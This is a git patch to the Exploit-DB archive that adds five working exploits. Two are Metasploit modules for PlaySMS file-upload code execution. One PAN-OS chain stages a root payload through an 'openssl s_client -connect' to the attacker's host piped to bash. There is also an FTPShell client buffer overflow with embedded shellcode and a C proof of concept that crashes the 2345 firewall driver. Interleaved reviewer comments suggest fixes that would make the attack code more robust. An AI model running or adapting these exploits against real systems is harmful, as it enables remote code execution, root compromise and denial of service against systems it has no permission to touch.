From 635ec8450438d1b907fbd0b84ee2ec777bc67dba Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 9 May 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-05-09 5 changes to exploits/shellcodes 2345 Security Guard 3.7 - Denial of Service FTPShell Client 6.7 - Buffer Overflow Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit) PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit) PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit) Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes) --- exploits/php/remote/44598.rb | 193 ++++++++++++++++++++++++++++++ exploits/php/remote/44599.rb | 189 +++++++++++++++++++++++++++++ exploits/unix/remote/44597.rb | 198 +++++++++++++++++++++++++++++++ exploits/windows/remote/44596.py | 58 +++++++++ exploits/windows_x86/dos/44600.c | 180 ++++++++++++++++++++++++++++ files_exploits.csv | 5 + files_shellcodes.csv | 2 +- 7 files changed, 824 insertions(+), 1 deletion(-) create mode 100755 exploits/php/remote/44598.rb create mode 100755 exploits/php/remote/44599.rb create mode 100755 exploits/unix/remote/44597.rb create mode 100755 exploits/windows/remote/44596.py create mode 100644 exploits/windows_x86/dos/44600.c diff --git a/exploits/php/remote/44598.rb b/exploits/php/remote/44598.rb new file mode 100755 index 000000000..000754887 --- /dev/null +++ b/exploits/php/remote/44598.rb 
@@ -0,0 +1,193 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlaySMS import.php Authenticated CSV File Upload Code Execution', + 'Description' => %q{ + This module exploits an authenticated file upload remote code excution vulnerability + in PlaySMS Version 1.4. This issue is caused by improper file contents handling in + import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV + file containing a malicious payload via vectors involving the User-Agent HTTP header + and PHP code in the User-Agent. + This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7. + }, + 'Author' => + [ + 'Touhid M.Shaikh ' # Discoverys and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE','2017-9101'], + ['URL','https://www.youtube.com/watch?v=KIB9sKQdEwE'], + ['EDB','42044'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64', + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'PlaySMS 1.4', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 21 2017')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin']) + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 
302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + vprint_status('Trying to Login ......') + # Send Creds with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login', + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }.to_a.shuffle], + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Try to access index page with authenticated cookie. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + }) + + # if we redirect to core_welcome dan we assume we have authenticated cookie. + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome') + print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]") + end + end + + + # Tested successfully on Dina: 1.0.1 machine on vulnhub. 
+ # Link : https://www.vulnhub.com/entry/dina-101,200/ + def exploit + + cookies = login + + # Agian CSRF token. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_phonebook', + 'route' => 'import', + 'op' => 'list', + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for upload : #{csrf}") + + # Payload. + evil = "" + #making csv file body + final_csv = "Name,Email,Department\n" + final_csv << "#{evil},#{rand(1..100)},#{rand(1..100)}" + # setup POST request. + post_data = Rex::MIME::Message.new + post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token + post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name="fnpb"; filename="agent22.csv"') #payload + data = post_data.to_s + + vprint_status('Trying to upload malicious CSV file ....') + # Lets Send Upload request. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'POST', + 'agent' => payload.encode, + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_phonebook', + 'route' => 'import', + 'op' => 'import', + }.to_a.shuffle], + 'headers' => { + 'Upgrade-Insecure-Requests' => '1', + }, + 'Connection' => 'close', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + end +end \ No newline at end of file diff --git a/exploits/php/remote/44599.rb b/exploits/php/remote/44599.rb new file mode 100755 index 000000000..b28cd76e9 --- /dev/null 
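Review bot: `check` dereferences `res` with no nil guard: `send_request_cgi` returns nil on a timeout or refused connection rather than raising, so `res.code` right after the `rescue` block raises NoMethodError instead of yielding `CheckCode::Unknown`, and `res.headers['Location'].include?` fails the same way on a 302 with no Location header. I would add `return CheckCode::Unknown unless res` before the status test and compare with `res.headers['Location'].to_s.include?(...)`; the first `send_request_cgi` in `login` has the same gap (`=~ res.body` before any nil check), and the 44599.rb hunk repeats the `check` pattern. Separately, the `print_good` on a successful login and the `fail_with` message both echo the plaintext PASSWORD into the console and module log; `store_valid_credential` already records it, so the messages could name only the user. The `fail_with(..., "Did not respond to Login request")` text is also reused for the later phonebook request in `exploit`, which makes the log misleading when that second request is the one that fails.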
+++ b/exploits/php/remote/44599.rb 
@@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution', + 'Description' => %q{ + This module exploits a code injection vulnerability within an authenticated file + upload feature in PlaySMS v1.4. This issue is caused by improper file name handling + in sendfromfile.php file. + Authenticated Users can upload a file and rename the file with a malicious payload. + This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7. + }, + 'Author' => + [ + 'Touhid M.Shaikh ', # Discoverys and Metasploit Module + 'DarkS3curity' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB','42003'], + ['CVE','2017-9080'], + ['URL','https://www.youtube.com/watch?v=MuYoImvfpew'], + ['URL','http://touhidshaikh.com/blog/?p=336'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64', + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'PlaySMS 1.4', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 21 2017')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin']) + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 
302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + CheckCode::Safe + end + + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + vprint_status('Trying to Login ......') + # Send Creds with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login', + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }.to_a.shuffle], + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Try to access index page with authenticated cookie. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # if we redirect to core_welcome dan we assume we have authenticated cookie. 
+ if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome') + print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]") + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]") + end + end + + def exploit + cookies = login + + # Agian CSRF token. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_sendfromfile', + 'op' => 'list', + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Grabbing CSRF token from body. + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for upload : #{csrf}") + + # Payload. + evilname = "" + + # setup POST request. + post_data = Rex::MIME::Message.new + post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token + post_data.add_part("#{rand_text_alpha(8 + rand(5))}", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload + post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra + data = post_data.to_s + + vprint_status('Trying to upload file with malicious Filename Field....') + # Lets Send Upload request. 
+ res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'POST', + 'agent' => payload.encode, + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_sendfromfile', + 'op' => 'upload_confirm', + }.to_a.shuffle], + 'headers' => { + 'Upgrade-Insecure-Requests' => '1', + }, + 'Connection' => 'close', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + end +end \ No newline at end of file diff --git a/exploits/unix/remote/44597.rb b/exploits/unix/remote/44597.rb new file mode 100755 index 000000000..819320bc5 --- /dev/null +++ b/exploits/unix/remote/44597.rb 
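Review bot: The `post_data.add_part(...)` calls in `exploit` pass `content_type = nil, transfer_encoding = nil, content_disposition = ...` as positional arguments; in Ruby these are assignments evaluated in the caller, so they create three unused locals and give none of the keyword-argument checking the naming suggests — pass the values plainly, e.g. `post_data.add_part(csrf, nil, nil, 'form-data; name="X-CSRF-Token"')`. The same construction appears in the 44598.rb hunk. The CSRF regex `/name="X-CSRF-Token" value="(?[a-z0-9"]+)">/` as rendered here is not valid Ruby (`(?[` carries no group name), so the `csrf` local it is meant to define would never be set; presumably the named capture was lost in this rendering, but it is worth confirming against the committed file. `check` also returns `Appears` on nothing more than a redirect to the `core_auth` login route, which any PlaySMS install produces, so the result should be documented as a presence check rather than a 1.4 version check, e.g. `# A login redirect only shows PlaySMS is present; the version is not fingerprinted`.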
@@ -0,0 +1,198 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Palo Alto Networks readSessionVarsFromFile() Session Corruption', + 'Description' => %q{ + This module exploits a chain of vulnerabilities in Palo Alto Networks products running + PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using + an authentication bypass flaw to to exploit an XML injection issue, which is then + abused to create an arbitrary directory, and finally gains root code execution by + exploiting a vulnerable cron script. This module uses an initial reverse TLS callback + to stage arbitrary payloads on the target appliance. The cron job used for the final + payload runs every 15 minutes by default and exploitation can take up to 20 minutes. 
+ }, + 'Author' => [ + 'Philip Pettersson ', # Vulnerability discovery + 'hdm' # Metasploit module + ], + 'References' => [ + ['CVE', '2017-15944'], + ['URL', 'http://seclists.org/fulldisclosure/2017/Dec/38'], + ['BID', '102079'], + ], + 'DisclosureDate' => 'Dec 11 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => {'BadChars' => '', 'Space' => 8000, 'DisableNops' => true}, + 'Targets' => [['Automatic', {}]], + 'DefaultTarget' => 0, + 'DefaultOptions' => {'WfsDelay' => 2} + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ]) + ]) + end + + def exploit + + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + + # Set the base directory and the staging payload directory path name + base_directory = "/opt/pancfg/mgmt/logdb/traffic/1/" + command_payload = "* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ; " + target_directory = base_directory + command_payload + + if target_directory.length > 255 + print_error("The selected payload or options resulted in an encoded command that is too long (255+ bytes)") + return + end + + dev_str_1 = Rex::Text.rand_text_alpha_lower(1+rand(10)) + dev_str_2 = Rex::Text.rand_text_alpha_lower(1+rand(10)) + user_id = rand(2000).to_s + + print_status("Creating our corrupted session ID...") + + # Obtain a session cookie linked to a corrupted session file. 
A raw request + # is needed to prevent encoding of the parameters injected into the session + res = send_request_raw( + 'method' => 'GET', + 'uri' => "/esp/cms_changeDeviceContext.esp?device=#{dev_str_1}:#{dev_str_2}%27\";user|s.\"#{user_id}\";" + ) + unless res && res.body.to_s.index('@start@Success@end@') + print_error("Unexpected response when creating the corrupted session cookie: #{res.code} #{res.message}") + return + end + + cookies = res.get_cookies + unless cookies =~ /PHPSESSID=([a-fA-F0-9]+)/ + print_error("Unexpected cookie response when creating the corrupted session cookie: #{res.code} #{res.message} #{cookies}") + return + end + + create_directory_tid = 1 + rand(1000) + create_directory_json = JSON.dump({ + "action" => "PanDirect", + "method" => "execute", + "data" => [ + Rex::Text.md5(create_directory_tid.to_s), + "Administrator.get", + { + "changeMyPassword" => true, + "template" => Rex::Text.rand_text_alpha_lower(rand(9) + 3), + "id" => "admin']\" async-mode='yes' refresh='yes' cookie='../../../../../..#{target_directory}'/>\x00" + } + ], + "type" => "rpc", + "tid" => create_directory_tid + }) + + print_status("Calling Administrator.get to create directory under #{base_directory}...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => '/php/utils/router.php/Administrator.get', + 'cookie' => cookies, + 'ctype' => "application/json", + 'data' => create_directory_json + ) + unless res && res.body.to_s.index('Async request enqueued') + print_error("Unexpected response when calling Administrator.get method: #{res.code} #{res.message}") + return + end + + register_dirs_for_cleanup(base_directory) + + print_status("Waiting up to 20 minutes for the cronjob to fire and execute...") + expiry = Time.at(Time.now.to_i + (60*20)).to_i + last_notice = 0 + while expiry > Time.now.to_i && ! session_created? 
+ if last_notice + 30 < Time.now.to_i + print_status("Waiting for a session, #{expiry - Time.now.to_i} seconds left...") + last_notice = Time.now.to_i + end + sleep(1) + end + + unless session_created? + print_error("No connection received from the target, giving up.") + end + + end + + def stage_real_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + comm = datastore['ListenerComm'] + if comm == "local" + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => true, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + + self.service.on_client_connect_proc = Proc.new { |client| + stage_real_payload(client) + } + + # Start the listening service + self.service.start + end + + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.kind_of?(Rex::Service) + if self.service.kind_of?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::SocketError + end + end + end + + # Accessor for our TCP payload stager + attr_accessor :service + +end \ No newline at end of file diff --git a/exploits/windows/remote/44596.py b/exploits/windows/remote/44596.py new file mode 100755 index 000000000..3f8b05806 --- /dev/null +++ b/exploits/windows/remote/44596.py 
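Review bot: `start_listener(ssl = false)` declares an `ssl` parameter that is never read: the `Rex::Socket::TcpServer.create` call hard-codes `'SSL' => true`, so the `start_listener(true)` call in `exploit` and the default value both disagree with what the method actually does — either drop the parameter or pass it through as `'SSL' => ssl`. In `cleanup`, the `rescue ::SocketError` around `deref`/`close`/`stop` is narrower than what those calls can raise (an `IOError` on an already-closed socket, for instance), so a failure there propagates out of the cleanup hook; this depends on the Rex service API, but rescuing `StandardError` with a `vprint_error` is the usual pattern for teardown. The 20-minute wait loop in `exploit` measures its deadline with `Time.now.to_i`, which moves with wall-clock adjustments; `Process.clock_gettime(Process::CLOCK_MONOTONIC)` is the idiomatic choice for elapsed time.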
@@ -0,0 +1,58 @@ +# -*- coding: utf-8 -*- + +# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow +# Date: 2018-01-03 +# Exploit Author: Sebastián Castro @r4wd3r +# Vendor Homepage: http://www.ftpshell.com/index.htm +# Software Link: http://www.ftpshell.com/download.htm +# Version: 6.7 +# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows XP SP3 x86. +# CVE : CVE-2018-7573 + +import socket +import sys + +port = 21 + +# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\x22\x0d\x0a' +buf = "" +buf += "\xdb\xc8\xba\x3e\x93\x15\x8f\xd9\x74\x24\xf4\x5e\x33" +buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xc6\x3a\x71" +buf += "\xe0\x73\xaa\xf7\x0b\x8c\x2a\x98\x82\x69\x1b\x98\xf1" +buf += "\xfa\x0b\x28\x71\xae\xa7\xc3\xd7\x5b\x3c\xa1\xff\x6c" +buf += "\xf5\x0c\x26\x42\x06\x3c\x1a\xc5\x84\x3f\x4f\x25\xb5" +buf += "\x8f\x82\x24\xf2\xf2\x6f\x74\xab\x79\xdd\x69\xd8\x34" +buf += "\xde\x02\x92\xd9\x66\xf6\x62\xdb\x47\xa9\xf9\x82\x47" +buf += "\x4b\x2e\xbf\xc1\x53\x33\xfa\x98\xe8\x87\x70\x1b\x39" +buf += "\xd6\x79\xb0\x04\xd7\x8b\xc8\x41\xdf\x73\xbf\xbb\x1c" +buf += "\x09\xb8\x7f\x5f\xd5\x4d\x64\xc7\x9e\xf6\x40\xf6\x73" +buf += "\x60\x02\xf4\x38\xe6\x4c\x18\xbe\x2b\xe7\x24\x4b\xca" +buf += "\x28\xad\x0f\xe9\xec\xf6\xd4\x90\xb5\x52\xba\xad\xa6" +buf += "\x3d\x63\x08\xac\xd3\x70\x21\xef\xb9\x87\xb7\x95\x8f" +buf += "\x88\xc7\x95\xbf\xe0\xf6\x1e\x50\x76\x07\xf5\x15\x88" +buf += "\x4d\x54\x3f\x01\x08\x0c\x02\x4c\xab\xfa\x40\x69\x28" +buf += "\x0f\x38\x8e\x30\x7a\x3d\xca\xf6\x96\x4f\x43\x93\x98" +buf += "\xfc\x64\xb6\xfa\x63\xf7\x5a\xd3\x06\x7f\xf8\x2b" + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", port)) + s.listen(5) + print("[+] FTP server started on port: "+str(port)+"\r\n") +except: + print("[x] Failed to start the server on port: "+str(port)+"\r\n") + +eip = "\xed\x2e\x45" # CALL ESI from FTPShell.exe : 0x00452eed +nops = "\x90"*40 +junk = "F"*(400 - len(nops) - len(buf)) +payload = nops + buf + junk + eip 
+ +while True: + conn, addr = s.accept() + conn.send('220 FTP Server\r\n') + print(conn.recv(1024)) + conn.send("331 OK\r\n") + print(conn.recv(1024)) + conn.send('230 OK\r\n') + print(conn.recv(1024)) + conn.send('220 "'+payload+'" is current directory\r\n') \ No newline at end of file diff --git a/exploits/windows_x86/dos/44600.c b/exploits/windows_x86/dos/44600.c new file mode 100644 index 000000000..24c95c36a --- /dev/null +++ b/exploits/windows_x86/dos/44600.c 
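Review bot: The bare `except:` around the socket setup prints the failure and then falls through, so when the bind fails the `while True` loop raises `NameError` on `s.accept()` because `s` was never assigned; the handler should end with `sys.exit(1)` (`sys` is imported and otherwise unused) and be narrowed to `except socket.error:`. The file also mixes interpreter conventions: `print(...)` with parentheses, but `conn.send('220 FTP Server\r\n')` with a `str` and a `buf` built from `\x..` escapes in plain string literals, both of which only produce byte data under Python 2 — a header line such as `# Requires Python 2 (str literals are sent as raw bytes)` would save the next reader a debugging session. Each accepted `conn` is never closed, so descriptors accumulate across iterations of the loop.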
@@ -0,0 +1,180 @@ +# Exploit Title: 2345 Security Guard 3.7 - Denial of Service +# Date: 2018-05-08 +# Exploit Author: anhkgg +# Vendor Homepage: http://safe.2345.cc/ +# Software Link: http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe +# Version: v3.7 +# Tested on: Windows 7 x86 +# CVE : CVE-2018-10809 +# +# BSOD caused of 2345NetFirewall.sys because of not validating input values,test version 3.7 on windows 7 x86 platform +# +# + +#include +#include + +struct NETFW_IOCTL_ADD_PID +{ + DWORD pid; + char seed[0x14];// +};//0x18 + +struct NETFW_IOCTL_SET_PID +{ + BYTE set_state;// + BYTE unk;//1 + WORD buf_len;//2 + DWORD pid;//4 + char buf[0x64];//8 +};//6c + +struct NETFW_IOCTL_222040 +{ + DWORD* ptr; + DWORD size; +};// + +int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2) +{ + int result; + + *a1 ^= *a2; + *a2 ^= *a1; + result = (unsigned __int8)*a2; + *a1 ^= result; + return result; +} + +int __stdcall sub_12A80(char *a1, int len, char *a3) +{ + int result; + unsigned __int8 v4; + __int16 i; + __int16 j; + unsigned __int8 k; + + for ( i = 0; i < 256; ++i ) + a3[i] = i; + a3[256] = 0; + a3[257] = 0; + k = 0; + v4 = 0; + result = 0; + for ( j = 0; j < 256; ++j ) + { + v4 += a3[j] + a1[k]; + f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]); + result = (k + 1) / len; + k = (k + 1) % len; + } + return result; +} + +char *__stdcall sub_12B60(char *a1, signed int len, char *a3) +{ + char *result; + __int16 i; + unsigned __int8 v5; + unsigned __int8 v6; + + v5 = a3[256]; + v6 = a3[257]; + for ( i = 0; i < len; ++i ) + { + v6 += a3[++v5]; + f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]); + a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])]; + } + a3[256] = v5; + result = a3; + a3[257] = v6; + return result; +} + +void calc_seed(char* seed, char* dst) +{ + char Source1[26] = {0}; + char a3[300] = {0}; + + Source1[0] = 8; + Source1[1] = 14; + Source1[2] = 8; + Source1[3] = 10; + Source1[4] = 2; + Source1[5] = 3; + Source1[6] = 29; + Source1[7] = 23; + Source1[8] = 13; + Source1[9] 
= 3; + Source1[10] = 15; + Source1[11] = 22; + Source1[12] = 15; + Source1[13] = 7; + Source1[14] = 91; + Source1[15] = 4; + Source1[16] = 18; + Source1[17] = 26; + Source1[18] = 26; + Source1[19] = 3; + Source1[20] = 4; + Source1[21] = 1; + Source1[22] = 15; + Source1[23] = 25; + Source1[24] = 10; + Source1[25] = 13; + + sub_12A80(seed, 0x14, a3); + sub_12B60(Source1, 0x1A, a3); + memcpy(dst, Source1, 26); +} + +int poc_2345NetFirewall() +{ + HANDLE h = CreateFileA("\\\\.\\2345NetFirewall", + GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, + NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if(h == INVALID_HANDLE_VALUE) { + printf("[-] Open device error: %d\n", GetLastError()); + return 1; + } + DWORD BytesReturned = 0; + + DWORD ctlcode = 0x222298; + NETFW_IOCTL_ADD_PID add_pid = {0}; + add_pid.pid = GetCurrentProcessId(); + + if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + ctlcode = 0x2222A4; + NETFW_IOCTL_SET_PID set_pid = {0}; + set_pid.pid = GetCurrentProcessId(); + set_pid.set_state = 1; + + calc_seed(add_pid.seed, set_pid.buf); + set_pid.buf_len = 26; + + if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + //BSOD + ctlcode = 0x222040; + NETFW_IOCTL_222040 buf_222040 = {0}; + buf_222040.size = 1; + buf_222040.ptr = (DWORD*)0x80000000; + if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + return 0; +} + +int main() +{ + poc_2345NetFirewall(); + + return 0; +} \ No newline at end of file 
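Review bot: The `#`-prefixed header lines (`# Exploit Title: ...` through the bare `#` lines) are not C comments; the preprocessor rejects `# Exploit Title` as an invalid directive, so the file as committed does not compile until they are wrapped in `/* ... */` or `//`. The two `#include` lines carry no header name as rendered here, and declarations such as `NETFW_IOCTL_ADD_PID add_pid` omit the `struct` tag, which only compiles as C++ despite the `.c` extension — worth confirming the intended build (presumably MSVC in C++ mode) in a comment. `f_XOR__12A30` is an XOR swap, which zeroes the byte when `a1 == a2`; in `sub_12B60` that happens whenever `v5 == v6` (and in `sub_12A80` whenever `j == v4`), so if this faithfully mirrors the driver's own routine it deserves a comment like `/* XOR swap: zeroes the byte when both indices coincide; kept to match the driver */`, and if not it is a bug. `printf("... %x error: %d", ctlcode, GetLastError())` formats DWORD values with `%x`/`%d` (use `%lx`/`%lu`), and the device handle `h` is never released with `CloseHandle(h)` before `poc_2345NetFirewall` returns.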
diff --git a/files_exploits.csv b/files_exploits.csv
index 675b21eab..7496ae29e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
